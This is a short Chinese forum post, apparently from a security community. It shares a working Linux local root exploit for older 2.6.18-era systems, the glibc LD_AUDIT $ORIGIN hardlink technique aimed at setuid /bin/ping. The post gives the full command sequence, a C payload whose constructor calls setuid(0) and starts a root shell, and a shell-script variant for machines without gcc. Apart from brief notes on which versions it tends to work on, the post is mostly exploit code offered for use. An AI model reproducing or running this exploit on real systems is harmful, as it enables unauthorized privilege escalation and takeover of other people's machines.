exp,对部分2.6.18*的有用

2012-12-21 18:10:48 22 5431
应该是2010年出的吧,可能有部分同学那时没有注意到,此方法可以提低版本的2.6.18*.
2012就不用试了,2011的有时可以成功
mkdir /tmp/exploit

ln /bin/ping /tmp/exploit/target

exec 3< /tmp/exploit/target

rm -rf /tmp/exploit/

gcc -w -fPIC -shared -o /tmp/exploit payload.c 

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
payload.c
void __attribute__((constructor)) init()  



{  



   setuid(0);  



   system("/bin/bash");  



}  
当不能gcc时,解压XXX,扔上去试下
#!/bin/sh

unset LD_AUDIT

rm -r -f /var/tmp/exploit

mkdir /var/tmp/exploit

ln /bin/ping /var/tmp/exploit/target

exec 3< /var/tmp/exploit/target

ls -l /proc/$$/fd/3

rm -rf /var/tmp/exploit

ls -l /proc/$$/fd/3

cp xxx /var/tmp/exploit

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

unset LD_AUDIT
类别 手机无线

关于作者

k@i26篇文章411篇回复

k@i
22

评论22次

要评论?请先  登录  或  注册